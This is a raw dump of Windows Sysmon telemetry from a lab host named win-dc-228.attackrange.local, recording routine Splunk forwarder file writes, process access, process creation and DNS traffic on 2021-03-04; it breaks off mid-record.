23542300x80000000000000002203044Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:14.939{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DA97C4CDF311E9351D2A8211216AF25,SHA256=E2640EBDBFB5D9DE2F66A6DA3062AC5AFB2216A773E2EF4C180C46C1C089F37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203043Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:14.689{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198586D365FEF7F73F3E82F994D47C80,SHA256=ED8390B894AA6556BCA2E39C60A00157183DD7FF641078E370DC1F2BB4ADD9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203045Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:15.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F767EC214AE7B4602887EB568DEBD39,SHA256=9A7AA6BC44F5611F7D1AA99FB804AE429920766C9C948582067856809C90819C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203048Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:16.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96100F3EBC201058D60DC0EF955CCAB8,SHA256=1A3A23611FE4207F7F88DE8AF5DCDD432A9FB8C5519E61038F61C41518037126,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203047Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:11.744{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54210- 23542300x80000000000000002203046Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:16.127{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C88BED6E5786B8E2B3A7DDE077751D9,SHA256=B24A5AB126A27ED5CE0C31DCC2CA7FCCCEE0AA631CC63B7C91EF2A90AA2C7E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203060Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.721{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82A6D5D2EA46CD80802AEBB3CBF76BA,SHA256=F97997D64EDFF8C8D2FA7FED220E2ADDF4EEE659C780FC173F565944FFA2DE3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203059Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.627{5ABCFE62-E995-6040-3D4E-00000000AD01}64601348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203058Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E995-6040-3D4E-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203057Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203056Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203055Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203054Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203053Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E995-6040-3D4E-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203052Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.486{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E995-6040-3D4E-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203051Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.487{5ABCFE62-E995-6040-3D4E-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002203050Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:12.947{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60693-false10.0.1.12-8000- 354300x80000000000000002203049Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:12.759{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54210- 10341000x80000000000000002203079Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.861{5ABCFE62-E996-6040-3F4E-00000000AD01}63645356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203078Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E996-6040-3F4E-00000000AD01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203077Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203076Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203075Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203074Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203073Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E996-6040-3F4E-00000000AD01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203072Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.736{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E996-6040-3F4E-00000000AD01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203071Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.737{5ABCFE62-E996-6040-3F4E-00000000AD01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203070Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.721{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC781D9C2877A2543314C389EC1B82E5,SHA256=AC708D05EB93BD01B5F0AC1C82EBF5620EC5D58BD847C79F0A113785060C0CC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203069Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.486{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F13AA1F16BBE46DAD554C23A41B91BB,SHA256=5F13B6F405F4C1A4016EC0BC3337F1062495575328EDF618AFBC5A6988B3559F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203068Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E996-6040-3E4E-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203067Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203066Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203065Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203064Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 